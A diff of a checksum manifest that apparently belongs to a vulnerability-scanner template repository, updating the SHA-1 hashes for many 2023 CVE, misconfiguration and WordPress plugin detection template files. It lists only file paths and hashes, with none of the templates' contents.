-http/cves/2023/CVE-2023-33510.yaml:e55f34f9aafd7e86e5986bc31edd1c73cc1b938d -http/cves/2023/CVE-2023-33568.yaml:b0fea05f887aab025f3e11aed028e0ea35e93fa8 -http/cves/2023/CVE-2023-33584.yaml:b5b9f3cb92a955113e74b78efb91f173cf388a6b -http/cves/2023/CVE-2023-33629.yaml:d629260b753c93e398264eca0ff3ffd1066be134 -http/cves/2023/CVE-2023-33831.yaml:2cb6560df8c2541cfab9a1f50c78d82c6df86880 -http/cves/2023/CVE-2023-34124.yaml:d2953c4414275408e2817dcf83f6ddb0e7d25077 -http/cves/2023/CVE-2023-34192.yaml:df55cbdec390190fd0544a6a5d569813e116bae7 -http/cves/2023/CVE-2023-34259.yaml:627938a91a0871a5d67eaefcbe09af5f2f105e56 -http/cves/2023/CVE-2023-34362.yaml:5299d0f80b5136d314e877eff82d092edccceed8 -http/cves/2023/CVE-2023-34537.yaml:2ce29eab9199c5af693269d3aa0830d7cee3832d -http/cves/2023/CVE-2023-34598.yaml:ba83d73ae8edee4b488e96972bd9c9007be669ba -http/cves/2023/CVE-2023-34599.yaml:1d7b63fb78f7ba4800622715fe702c844e6f3534 +http/cves/2023/CVE-2023-32563.yaml:c01bdf3d6eab4bc7e23f3cb6cabca81f1c2310fe +http/cves/2023/CVE-2023-33338.yaml:444d73f0a127d117cbba9a51d95cd4d94f2d228f +http/cves/2023/CVE-2023-33405.yaml:9ce6b464f9bf59008681f1d821f185567d826f40 +http/cves/2023/CVE-2023-33439.yaml:a064ec998ee032ab559b5bd212ce6bee7e541e2e +http/cves/2023/CVE-2023-33440.yaml:5e7ac21a7269ddb72d247f4a710489641902b138 +http/cves/2023/CVE-2023-3345.yaml:780c79c5ea86faf68e601bd0c238d5c2fa93fff0 +http/cves/2023/CVE-2023-33510.yaml:c35393936c6d750e5370b38b1613e7ed2a020052 +http/cves/2023/CVE-2023-33568.yaml:dc1891d12b8cb2fb9c9a7e79ebc1fe69563c901e +http/cves/2023/CVE-2023-33584.yaml:43922c7934326fda2f87fbc990a6c0b38806288f +http/cves/2023/CVE-2023-33629.yaml:356007911da255ad7f2ee3a5c9ae7bb7e07fa822 +http/cves/2023/CVE-2023-33831.yaml:e4520fad2193ece7bd21bf1ad85f707a60878128 +http/cves/2023/CVE-2023-34124.yaml:46414ae11be99f222ea8debfc463d2d42fcf8e40 +http/cves/2023/CVE-2023-34192.yaml:1443d53e36bf93ff4c58896b00cf8385957b99ca +http/cves/2023/CVE-2023-34259.yaml:2fd2115d4d83b9a7fda17be38ce019f222d76438 +http/cves/2023/CVE-2023-34362.yaml:2f2cc3621660a7939e31ddbc7e7f3fda32ddd20b +http/cves/2023/CVE-2023-34537.yaml:0a71d9b8cb8e3310191ddcd363d1612192bb37cc +http/cves/2023/CVE-2023-34598.yaml:1c11573ef0d2f29efaf80ed0fb405d973b3d4909 +http/cves/2023/CVE-2023-34599.yaml:fe691945968360c7f32ae9569a352a0c542599ca http/cves/2023/CVE-2023-3460.yaml:a606f31c7232e06527e6a70e0dcc04f26e6dce56 -http/cves/2023/CVE-2023-34659.yaml:8ea4521a0e1e5424e82897765689cd6ba92e986c -http/cves/2023/CVE-2023-34751.yaml:12248c163b168ab94110e6e4762b9d7865ce6a5b -http/cves/2023/CVE-2023-34752.yaml:53c85e0b19e49977e7871553fb768a8b8e05c6c0 -http/cves/2023/CVE-2023-34753.yaml:0c71291e1f5a9a17216f5e559bbafde89c1c2ade -http/cves/2023/CVE-2023-34755.yaml:0785551c91ea4ac33857e980309d9ccf33586085 -http/cves/2023/CVE-2023-34756.yaml:4c19c82c394f7da46ac35dff6008dc175f906145 -http/cves/2023/CVE-2023-3479.yaml:6e8db3cb2ba1f3265855f60275220cc897c010b0 -http/cves/2023/CVE-2023-34843.yaml:f42986cf17644fd83f1ae1ddfacf9feb8f6d3bed -http/cves/2023/CVE-2023-34960.yaml:2ae3369ff4e3b54409598ebdc322e01ffa38666d +http/cves/2023/CVE-2023-34659.yaml:586d72a58ffeb5e83203be57f290091689769090 +http/cves/2023/CVE-2023-34751.yaml:e5e31d0b9c8b413259a10c9608961ab79b03e6a5 +http/cves/2023/CVE-2023-34752.yaml:c5c94399ae11f8c0e3f975ccf7df6342faf02c07 +http/cves/2023/CVE-2023-34753.yaml:130078e9eb00fedcee7307a5b9bccc6a90432fc2 +http/cves/2023/CVE-2023-34755.yaml:93e8de2b01b6253e3533a64c8eddb6a6e3837682 +http/cves/2023/CVE-2023-34756.yaml:148604510c70a2432171ca73cdb5cd94fdf7e257 +http/cves/2023/CVE-2023-3479.yaml:c93badf415af3d034a7c6ee0d874353ce2a4492d +http/cves/2023/CVE-2023-34843.yaml:8e4a285d1cbdd9ee9c905dee5b853ee355bc5fd0 +http/cves/2023/CVE-2023-34960.yaml:40097a60a8865210f40690f336e4b12204bece1f http/cves/2023/CVE-2023-35078.yaml:67695cea87583e35f99cef49a4c8afe9fd4daa2c -http/cves/2023/CVE-2023-35082.yaml:21f428d98601e7af065b4d1d729f42a9a6f5f49b -http/cves/2023/CVE-2023-35813.yaml:9dfbf5ad2d62336fd494cfe50f0a23ad9d3aca07 -http/cves/2023/CVE-2023-35843.yaml:f59bebf1b3d2f2ec65f1ba70f2895f97eeafc245 -http/cves/2023/CVE-2023-35844.yaml:bd2c8125cf1377ee8ccfa60f03d1b8eaa77c5ca5 -http/cves/2023/CVE-2023-35885.yaml:aa812f9e2a073adf7d587841720494601c09a2f0 -http/cves/2023/CVE-2023-36287.yaml:fc8653198439e2330afb8e088290d4f330572892 -http/cves/2023/CVE-2023-36289.yaml:94ae2b397ee756d4c6ea99e73a3e58c8442c49c6 -http/cves/2023/CVE-2023-36306.yaml:3d4dc102a23e72660c2fe47d62843625f8423e7b -http/cves/2023/CVE-2023-36346.yaml:fe6d29851d56252fcdbc7f4648770001185aa45f -http/cves/2023/CVE-2023-36844.yaml:210062d306c85a48e3b2d0489ff7381add3c2e39 -http/cves/2023/CVE-2023-36845.yaml:a7a6d382b38ea004f692d26293423b7271bbb45c -http/cves/2023/CVE-2023-36934.yaml:dd7e4c46565050d5531a36b728c327578ed9dcf5 -http/cves/2023/CVE-2023-3710.yaml:bd1bf08accd34152ffdb6841a00866b9bcd6a335 -http/cves/2023/CVE-2023-37265.yaml:e14d6277aaa37f121165649952189b0a9854f6d1 -http/cves/2023/CVE-2023-37266.yaml:5a7a759d2a19922627ed8d2d08450af440913d85 -http/cves/2023/CVE-2023-37270.yaml:61b3ec477bb4145ac589ae4dec8bb5473f9991eb -http/cves/2023/CVE-2023-37462.yaml:b45345e69acd4cd2edae00b75a5ff3eca0363dd6 -http/cves/2023/CVE-2023-37474.yaml:810cee8a1468dbcd53e6adec99795e561938ecd7 -http/cves/2023/CVE-2023-37580.yaml:db512d777918df7d536f660faf488826a5ccdc8d -http/cves/2023/CVE-2023-37629.yaml:fb4fe55126737a11d2c7cb0e644bfe211733d56d -http/cves/2023/CVE-2023-3765.yaml:ee54d30e91d6ed6e784757aa1214a88849d21fa4 -http/cves/2023/CVE-2023-37679.yaml:58c2fa7403e9eb33155bec5a8e4154c9bc2d6dbf -http/cves/2023/CVE-2023-37728.yaml:cd285746ff326b2050068cfdd7be6965e63f67f0 -http/cves/2023/CVE-2023-37979.yaml:83b5cc97554797a16d7dde249004c7bda1461015 +http/cves/2023/CVE-2023-35082.yaml:d0865cbcb31c6c0cd93e5357243282ff6389e435 +http/cves/2023/CVE-2023-35813.yaml:c5017577e32536039563c0fcb7e8b65783c72a8c +http/cves/2023/CVE-2023-35843.yaml:c2436af29f2776879682061c1edb6035121e278a +http/cves/2023/CVE-2023-35844.yaml:b4c1f08ba5eeb3a13ad06d81d55ec933e74271ea +http/cves/2023/CVE-2023-35885.yaml:d5ef379867aafb4e8333f8d7b123583561c272be +http/cves/2023/CVE-2023-36287.yaml:9ebdd64a4cd85dada935bdec068721a80cacddd4 +http/cves/2023/CVE-2023-36289.yaml:96dc9856a6cd817c19aab5ad369d43dc74296205 +http/cves/2023/CVE-2023-36306.yaml:632b985cca8f61d046f63759f3371060c60a4a6d +http/cves/2023/CVE-2023-36346.yaml:f96e760693310975c13d11a0fdcdb24fe573bede +http/cves/2023/CVE-2023-36844.yaml:ae8c8500fcc9b2baa808fe6a60ad1dc4e4d2d2ed +http/cves/2023/CVE-2023-36845.yaml:5de3391579d4e28313ab19554646fc454226aa7a +http/cves/2023/CVE-2023-36934.yaml:abb5cfaf4ea2a74a51404e16229917cfa3f1d729 +http/cves/2023/CVE-2023-3710.yaml:06f15186800b26a623978faf0c392aac2064c7e7 +http/cves/2023/CVE-2023-37265.yaml:64ba0ea95b52603f52e4515590adad6e6e489f33 +http/cves/2023/CVE-2023-37266.yaml:9fb6fd201726f1fcc45ad67f333ac91cce5ad561 +http/cves/2023/CVE-2023-37270.yaml:0cb300d3e97f517557540e766ab43ddda940ea30 +http/cves/2023/CVE-2023-37462.yaml:52b9e6b828879ee58fc610cfcfe4e6f0ca19c546 +http/cves/2023/CVE-2023-37474.yaml:6a95724a377019790aa7c62103adc916f9076367 +http/cves/2023/CVE-2023-37580.yaml:6d401365707aed4e94176cd3b601bd863b0ca7a8 +http/cves/2023/CVE-2023-37629.yaml:9180500c618ded140c7a971ddbbfb38f48573c73 +http/cves/2023/CVE-2023-3765.yaml:573762c2e8da2bd85fec23eb3ce938917692e042 +http/cves/2023/CVE-2023-37679.yaml:62ea3cd1588a7a22b4d4109a03e725347288f947 +http/cves/2023/CVE-2023-37728.yaml:9974b242e254bbc28caf3417026220b032473e47 +http/cves/2023/CVE-2023-37979.yaml:5fbfe5cbf2fcc38e1757dcb1aec95297fb073668 http/cves/2023/CVE-2023-38035.yaml:15d889f727aeaff0c546f65f346dde3c5e5b23a5 -http/cves/2023/CVE-2023-38205.yaml:dc84e258645604cfd9232b4832e3b62ff5cf7b9e -http/cves/2023/CVE-2023-3836.yaml:27346ee8f06f6cc43d24440ebd39ed1d23637742 -http/cves/2023/CVE-2023-3843.yaml:035208a40790651e1c79e2978e35f820ee76d4cb -http/cves/2023/CVE-2023-38433.yaml:d60d4b1f018619f5c9cd8b0d6dfc8d6cf3754dea -http/cves/2023/CVE-2023-3844.yaml:f309fa0972aa92d6da2c3541ed7e10dcd1f28204 -http/cves/2023/CVE-2023-3845.yaml:3ce4f37137b5bca26e35a0643273a86f8b5981e5 -http/cves/2023/CVE-2023-3846.yaml:ad9bedb96a335610a8268a497439685e56d5f18f -http/cves/2023/CVE-2023-3847.yaml:c42b52b1df42129be19ba33ae531958b5b9212b0 -http/cves/2023/CVE-2023-3848.yaml:d7b78d45af69482cee313ad51c210ddd91ff2978 -http/cves/2023/CVE-2023-3849.yaml:200ed4709d137cc2d1e4ce63618af004d9e5d25f -http/cves/2023/CVE-2023-38501.yaml:351123ac0590d74de3d1af55b4d2727fa3fdfdb3 -http/cves/2023/CVE-2023-38646.yaml:224b2d118f383b3ea36a05e5e634915c5bb30859 -http/cves/2023/CVE-2023-39026.yaml:a231c84021e2de582ac8f4ae3b5d3d5cce88fd5b -http/cves/2023/CVE-2023-39108.yaml:dcf85660907c3efb75c5c2d17f8baaeeebcafd85 -http/cves/2023/CVE-2023-39109.yaml:3342d551101a5d02e3766c5fa6d01cfb5e04dcc3 -http/cves/2023/CVE-2023-39110.yaml:98490148b0df7d5deb2c2617f850d97ee9760aa8 +http/cves/2023/CVE-2023-38205.yaml:0a206e1c2b803d7c3c0c02fa50dbdf3cbaa96611 +http/cves/2023/CVE-2023-3836.yaml:4a44d6929f02fdf88db67584f753b032f1f21b28 +http/cves/2023/CVE-2023-3843.yaml:005fd9968388f8eceeb2e321ddc3486145a356b4 +http/cves/2023/CVE-2023-38433.yaml:7637abb99e27b7c978562301e829a6d40dee7888 +http/cves/2023/CVE-2023-3844.yaml:f32ffca70682cbb71d13706fc3dad5d5b9a099cd +http/cves/2023/CVE-2023-3845.yaml:ec480156c040f76950c6769e706e6025c0c4f3c0 +http/cves/2023/CVE-2023-3846.yaml:1dc3376fe52abe1d3a19fa9d848ebf02ef38d839 +http/cves/2023/CVE-2023-3847.yaml:18788185a7190d5baf47c451cc913b34ac44987c +http/cves/2023/CVE-2023-3848.yaml:0a7073ea64ca41d28fd24e234a9502ef6ccb25db +http/cves/2023/CVE-2023-3849.yaml:8a481fa6b06bd9351e38c1ba7c1a43c1155a4734 +http/cves/2023/CVE-2023-38501.yaml:8a13cc038eeb99aaf62d4c75ca19c0fb06804bae +http/cves/2023/CVE-2023-38646.yaml:9228f5cd0ee82aaeb4ae953d15306d7fe4d61917 +http/cves/2023/CVE-2023-39026.yaml:3c39b7fe5c8c0d602cdd97022dff8ccde7d45026 +http/cves/2023/CVE-2023-39108.yaml:37669bf00d7fdce1ac8b04548f235db33f97f848 +http/cves/2023/CVE-2023-39109.yaml:9d0b211027e721d1495654460f2d0eae5a4ef94e +http/cves/2023/CVE-2023-39110.yaml:ffba9564e4dbce9da06299e03c73b2bdf8062b67 http/cves/2023/CVE-2023-39120.yaml:9462c57e65e4d5929c6b9f1a18a31a7c9a3eb2db -http/cves/2023/CVE-2023-39141.yaml:1332cea485726e7c77b1a3e4288a46aa705f28fc -http/cves/2023/CVE-2023-39143.yaml:5759f732ad341257f9521c4698031676ab044ea2 -http/cves/2023/CVE-2023-3936.yaml:945b150512d180a67f683451554902435591aabe -http/cves/2023/CVE-2023-39361.yaml:be52be641d1a4ebd05e65c7f24e02b08a57f8227 -http/cves/2023/CVE-2023-39598.yaml:afbbe55321df66458500c76d0a116a134771898b -http/cves/2023/CVE-2023-39600.yaml:6c3070aa2e6a004c9c2a16fc364cf37be3c3dc54 -http/cves/2023/CVE-2023-39676.yaml:cebd5b3b7735ff69fbb8af741fa52081c8159c3a -http/cves/2023/CVE-2023-39677.yaml:b62ad08771ea03ca30ec0d980cb97cedca561d4d -http/cves/2023/CVE-2023-39700.yaml:7b84a3c608b05ca70582951000700b8859c73650 -http/cves/2023/CVE-2023-40208.yaml:321bd29d6733ce2e3e941ea02053c35d302b3290 -http/cves/2023/CVE-2023-40779.yaml:b550e59d3864c7a704063dd0e16c3fb4f862db10 -http/cves/2023/CVE-2023-4110.yaml:3bdf561f2480bdf87b4aee6ddd4168b5ac4fdc45 -http/cves/2023/CVE-2023-4111.yaml:f785f3254095371a481d04bb2b1994cd29c2b7ce -http/cves/2023/CVE-2023-4112.yaml:5bf0f95ffec416dd6e475f585ebc2f74a96c7696 -http/cves/2023/CVE-2023-4113.yaml:9dd0adea32b360886865520e0f2c56b497179cf5 -http/cves/2023/CVE-2023-4114.yaml:1f41cfbe883dbacef7bd660ac6aed53c51fe82a8 -http/cves/2023/CVE-2023-4115.yaml:f90cb6bab428332732dbfbe6efc6190c0bbbdccb -http/cves/2023/CVE-2023-4116.yaml:0b19e340abec999f4773c1aab6e3d756ddfba9f2 -http/cves/2023/CVE-2023-4148.yaml:5e4a12ec06d10d400ef6979e82bc2c88d13ddd4f -http/cves/2023/CVE-2023-41538.yaml:08a805a78f5b81300c0814e4111718e9654844e5 -http/cves/2023/CVE-2023-41642.yaml:dbaf49f4421c1279c5e61e040d2fc13ff9fd9d1b -http/cves/2023/CVE-2023-4168.yaml:4c7c3bcc0e34d15623f211a19aa10483b2294661 -http/cves/2023/CVE-2023-4169.yaml:7024b89a641982cb32c07a8fe2624b4e57f82af7 -http/cves/2023/CVE-2023-4173.yaml:02a83ac388cb9e795649fd644388dd8211cfb1e7 -http/cves/2023/CVE-2023-4174.yaml:1729505e19fff3d4d71bd9912032d744a70a320f -http/cves/2023/CVE-2023-41892.yaml:c1105bbd72f90b8d31c4522becc2f8f4d53710bf -http/cves/2023/CVE-2023-42442.yaml:e03e0f1c5f302479f539135a2db372e008562542 +http/cves/2023/CVE-2023-39141.yaml:f0f1212f781fa2e8cb77f567abb23b214d0b20d5 +http/cves/2023/CVE-2023-39143.yaml:ad54040cfdcc5a5df1d176dfe66560d8e4fee400 +http/cves/2023/CVE-2023-3936.yaml:65101f0968ac33b0e84a53a2bbdd56c6209c7c0f +http/cves/2023/CVE-2023-39361.yaml:23c31f57f43981dabb631801f73a5f56859fa7ac +http/cves/2023/CVE-2023-39598.yaml:5519dfdbfefac5828571577a05e96725e7f7a963 +http/cves/2023/CVE-2023-39600.yaml:9d6ef3b53c637194db0c577f0f0dc13baf5e21bd +http/cves/2023/CVE-2023-39676.yaml:76d072389d1bbd3730f1f7509aae3f1ffdf85289 +http/cves/2023/CVE-2023-39677.yaml:58d6b9749916e5794f0c474191a9c7c2de85feee +http/cves/2023/CVE-2023-39700.yaml:d47ad117e409d408f39d89fab6ea2235ac16de5d +http/cves/2023/CVE-2023-40208.yaml:0d3dd4d179c89524bfccaec84e2c106e720de3f9 +http/cves/2023/CVE-2023-40779.yaml:aca770bdfd65b01573ce2a95a5632094418af631 +http/cves/2023/CVE-2023-4110.yaml:bb54e552e627252a879540564991aedafb8375de +http/cves/2023/CVE-2023-4111.yaml:8f80aaa91c2db93b4461060843e1ad38a0638269 +http/cves/2023/CVE-2023-4112.yaml:3d39245a6f8a866d4b6eddf85f78504d38e21677 +http/cves/2023/CVE-2023-4113.yaml:29202294978fd3347e070e5b183c77db4f7cecc8 +http/cves/2023/CVE-2023-4114.yaml:c0d28619a0d99a9d77ebba7fa1f6a141dc501f59 +http/cves/2023/CVE-2023-4115.yaml:3a164892b8479bdd200177175e52259d641a0925 +http/cves/2023/CVE-2023-4116.yaml:698326ba3a35ce0b45cb13c66ee7566592516888 +http/cves/2023/CVE-2023-4148.yaml:2d199711e6c12b4f72f00bfc2f70afa6682941c2 +http/cves/2023/CVE-2023-41538.yaml:2615bcf44a6e8b11ce154773b1c1e3b05a783aa5 +http/cves/2023/CVE-2023-41642.yaml:51eca4de2f3495409385366934fb8bbe3497b13d +http/cves/2023/CVE-2023-4168.yaml:7cd5dac4d13dacd7e75118e18f84032d83a2e647 +http/cves/2023/CVE-2023-4169.yaml:6c1e56885e54d50897ffe13ae959bb4d3e3b3a91 +http/cves/2023/CVE-2023-4173.yaml:a104893fb3e6956fa162e71d5a3132ff1fac1daf +http/cves/2023/CVE-2023-4174.yaml:73c99e1302f59bc75410aa47bff332a4d24fc5dc +http/cves/2023/CVE-2023-41892.yaml:e56d36ac779ba140d3c7f30efd125d5f736f618b +http/cves/2023/CVE-2023-42442.yaml:5ceca597b5858d37cb92cdb9a9dbaaf4ddadf6f3 http/cves/2023/CVE-2023-42793.yaml:38aa019e461e0600a340cd71fb1f22fd937e99b4 -http/cves/2023/CVE-2023-43261.yaml:435f6b305d5bd92a9d2728afc002b2078550a4b4 -http/cves/2023/CVE-2023-43795.yaml:2d66952bcaf793aede0013cc2b549108e43996c3 -http/cves/2023/CVE-2023-4415.yaml:f5c0d669a8e9900d4a781b97f6f050899804c82d -http/cves/2023/CVE-2023-4451.yaml:b36e6a684503814c1635b8231668aa22a8c504e9 -http/cves/2023/CVE-2023-4547.yaml:6a046890e554f5086bcb5bb7969ef06ebdda4f5f -http/cves/2023/CVE-2023-4568.yaml:806c646ea1ebbe2a365a8053e3324272c531d94a -http/cves/2023/CVE-2023-45852.yaml:35e97b80a5cb32b98f0dbbba69baff00718bbbc8 -http/cves/2023/CVE-2023-4634.yaml:a9757d2930467b0e304b5cd8a4cf4186607faa03 -http/cves/2023/CVE-2023-46747.yaml:5edbdd20f689ca239c5171c4b81d81c4255d2b46 -http/cves/2023/CVE-2023-4714.yaml:9d5de29c00f3edd0134dcbbaa8f14e85cc2acf30 -http/cves/2023/CVE-2023-4966.yaml:841bd69c498df39b4397a77cb1ebd2bd3a3423db -http/cves/2023/CVE-2023-4974.yaml:5e8d20839065a049af031f8542d7a96596b10374 -http/cves/2023/CVE-2023-5074.yaml:6d476be89b3c64c16ffb80c834e1cfb1b3a388b1 -http/cves/2023/CVE-2023-5244.yaml:9225bc25e43b62e5b323550e0ba2bd04a0ffef36 -http/cves/2023/CVE-2023-5360.yaml:83978214bb056fab8455adc3a6bc072abedc1da0 +http/cves/2023/CVE-2023-43261.yaml:8d28b40c5a201ba7d647fcd8c840a60521a1086e +http/cves/2023/CVE-2023-43795.yaml:cdcc988d469760310ef953d01a3675c972c4d086 +http/cves/2023/CVE-2023-4415.yaml:1c60a99294a436ec8a13e167e562a50af59abc53 +http/cves/2023/CVE-2023-4451.yaml:284b3ee7e60e00f2c5246c99a7c6f845bc4b671f +http/cves/2023/CVE-2023-4547.yaml:60923323a8b828b50cfc71648be430438a6a36ed +http/cves/2023/CVE-2023-4568.yaml:5acd84083ee85d3a408677b020193da2c5da6ead +http/cves/2023/CVE-2023-45852.yaml:138aa24a923fac9c05e9205dd5ed314318e6a577 +http/cves/2023/CVE-2023-4634.yaml:d27b028eb3cee3c50ec3bc4ded1c0a29b2be5775 +http/cves/2023/CVE-2023-46747.yaml:7bf35d8e1d5d7ab870631a9e847e08b1b646c5e7 +http/cves/2023/CVE-2023-4714.yaml:ccaf9dd668fdfcd4014d83811cb0e5dd2024226c +http/cves/2023/CVE-2023-4966.yaml:f2f3e316b7db4aac0ecfa51c72337cfd30c5acce +http/cves/2023/CVE-2023-4974.yaml:10cf67159c24d732c7824233676a039332a9eaf0 +http/cves/2023/CVE-2023-5074.yaml:488f501a35038d07f0595b51918d51e3c1c44362 +http/cves/2023/CVE-2023-5244.yaml:3437e8e1c90d01b624e56152f0f55d3c70cb0a3e +http/cves/2023/CVE-2023-5360.yaml:4c4fe960c9fbbc391c726834ea8cfcda61a72d3c http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/UCMDB/ucmdb-default-login.yaml:627864b8eb2c47b7c717e1ed1800ba39eee5410c http/default-logins/abb/cs141-default-login.yaml:a5902dd34ba373c6f4e2cba15adbd9bf1e75e9c7 @@ -4770,7 +4770,7 @@ http/misconfiguration/installer/smf-installer.yaml:0580091dc1dff181409813ccc26c0 http/misconfiguration/installer/sms-installer.yaml:2cd4f4afe481e7f671618c6aff43642288403655 http/misconfiguration/installer/spa-cart-installer.yaml:49531886b7f6388b490c27462a4d305bb3b2f093 http/misconfiguration/installer/spip-install.yaml:a930529e3a291d50a9e0e16a83f4bb690902cc09 -http/misconfiguration/installer/sugarcrm-install.yaml:4f7175e89282f85fcea9dcdaf52b19b69d407d0d +http/misconfiguration/installer/sugarcrm-install.yaml:112cb3eb4d3b8239b2b6e95575cbb7c863aa6dd7 http/misconfiguration/installer/suitecrm-installer.yaml:0404be2f9c0f07fba0dc745e327c47100a006408 http/misconfiguration/installer/sumowebtools-installer.yaml:a1359c2e91cd54b314576328b4ebf5a5b4107fe7 http/misconfiguration/installer/tasmota-install.yaml:38006a16195e87b147f99dea60c4c05b6ea7c226 @@ -6100,219 +6100,219 @@ http/technologies/weblogic-detect.yaml:57acbd03a2cd58cd94f92843578359a5b479ac5d http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddfc6a34542 http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:8412732d698ba88550f2712b8c532524361a536f -http/technologies/wordpress/plugins/add-to-any.yaml:f6f1137f3145e709d48de0ffc2234cb59784cd2b -http/technologies/wordpress/plugins/admin-menu-editor.yaml:697dd0f8138940ee85785a6feca26c2faf1b4937 +http/technologies/wordpress/plugins/ad-inserter.yaml:7c7ad7856df54a6d07f0165c5dcf0f0ad6d23c2a +http/technologies/wordpress/plugins/add-to-any.yaml:9b81eae94b2462cd25acba71d43479aa4487add4 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:94a8bbf011e4d889a1efe82107c246eb14e71e02 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:dcb06ef4af8e1e9052b85368aa9daa245b682ee1 -http/technologies/wordpress/plugins/akismet.yaml:6858dc20e4ad38f071d5fd1e279141ed04a77a18 -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:c1fcb3e97d8e90eb4c4ea2f19f5b3a5908f41258 -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:1e29704bf9652fd0b638da646284bcbede750ef0 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:41d2d169b8b0c6d0ba5f7e849573f9d74eb6f868 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:4ee623a290d3e1652d24bd274794215d5d65b646 -http/technologies/wordpress/plugins/amp.yaml:b89984fd5c6e63021c88926afc26e04d8e39f2c6 -http/technologies/wordpress/plugins/antispam-bee.yaml:c9b70a4b3e2944782c6cf0811963d75df4b3414c -http/technologies/wordpress/plugins/astra-sites.yaml:bcb83e1ba829d6ece61ca3d9977e4f9bf9394139 -http/technologies/wordpress/plugins/astra-widgets.yaml:dc6eadb08dd021d7b6417a7c4c85b288bb1ee592 -http/technologies/wordpress/plugins/autoptimize.yaml:b1179f524f4eff6aff64c1bd51506d9fe941a0e9 -http/technologies/wordpress/plugins/backwpup.yaml:6d118288279b532911acd29e09278f632b10be86 -http/technologies/wordpress/plugins/better-search-replace.yaml:717492dc658c2b7639e8d25f3bfe75124fab352e -http/technologies/wordpress/plugins/better-wp-security.yaml:e8bf733546d9350cf0db9fea7a5e186e999462e5 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:780289ed80722237049adfdb3b0065401627f8b2 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:9489f265531c7cd68b5abde34af05dc17997c674 -http/technologies/wordpress/plugins/breeze.yaml:8b1042e810336e1f6228bea8aaba3908ee2f3cf1 -http/technologies/wordpress/plugins/broken-link-checker.yaml:641d803b9a9bccbfbb6d8c77f675bfcf5453b8e5 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:08be8d3dc777a692349a706c2f0f8f0688079b20 -http/technologies/wordpress/plugins/classic-editor.yaml:12f93b1da4b9c392a300aecdbcd459f72d853d93 -http/technologies/wordpress/plugins/classic-widgets.yaml:eeb29d3bb26627dc7778f8c4fd282bce57afee45 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:04f6146389f833db0e0d32eb9f461061997108b7 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:ac08e50eeb5547db6c587ba1c0d523e6fe163dd7 +http/technologies/wordpress/plugins/akismet.yaml:153edb1c1beff239fc145f00456118998b364f3d +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:bbb872ffe2427678869a354261dad27cf40126a6 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:54d433baf7ad8071625e18e1df4f943dc8610a4c +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:456b5ad394b494fc4925a023ff62c2189962a966 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:b50e7c3b7564a3544b70045300cd9876d0c9f3ac +http/technologies/wordpress/plugins/amp.yaml:7a8d95e32a8f6f2b3918daa2f1e6f4f1efca93a3 +http/technologies/wordpress/plugins/antispam-bee.yaml:d407510d4c601a644b3c174b2ada9315fde7216a +http/technologies/wordpress/plugins/astra-sites.yaml:0b52ec284906439c783a28f710dc2573f3b8e310 +http/technologies/wordpress/plugins/astra-widgets.yaml:a5cd99144816e167b6bd91f2d5375948b0ef96bf +http/technologies/wordpress/plugins/autoptimize.yaml:f0715badd894eedc35d28caffc58741b3c87b791 +http/technologies/wordpress/plugins/backwpup.yaml:a60b01af69950ba7ba59a7b0fa732f0c82a95250 +http/technologies/wordpress/plugins/better-search-replace.yaml:e80078920893f22c13c2b3e4b2a1b47ee43c5d2a +http/technologies/wordpress/plugins/better-wp-security.yaml:83cb7f2d1350585a18ea11e66de900f7f6b59405 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:0736ade44e0838cc7d607dce5bc8129e331f9211 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:2d97cc47ae24986c35a6e91d91c3eae3a3c656ed +http/technologies/wordpress/plugins/breeze.yaml:f61c5d47b0c11d2a6df3b58655202ee18d112262 +http/technologies/wordpress/plugins/broken-link-checker.yaml:3e630e141fae61a6c83c311d1248c72ec6cf6637 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:efc0920607537291f780a14121642eabfcf202c1 +http/technologies/wordpress/plugins/classic-editor.yaml:25a29d6a4ea0590eb8454a25a9b45efef6d7ca46 +http/technologies/wordpress/plugins/classic-widgets.yaml:ce79e15549e18596c7365fe34e7f5e57fe902894 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:f687850bf0ed738793e249ee80767f22c9829547 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:05a0001bbbd0517a4ad2ad8c0dbaf73ed9224188 -http/technologies/wordpress/plugins/coblocks.yaml:290386c39afeaa02439fd0f3897644b4b584def0 -http/technologies/wordpress/plugins/code-snippets.yaml:e6b69994373acfdf7c1d853685d74926e86ff21f -http/technologies/wordpress/plugins/coming-soon.yaml:b69b416181d3c24151a43180c6e1694d49aad0e0 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:8cb149c2a61ac7447d97d2ff4692244c5da54962 -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:efa4c0cd9e6150a6ada22a2fc64235d9675ad6d1 -http/technologies/wordpress/plugins/contact-form-7.yaml:32bd2b429767ba39975496e134ea399585d21a26 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:7f6b45ae09f6bfddb3bb1f231448cd755c2980c4 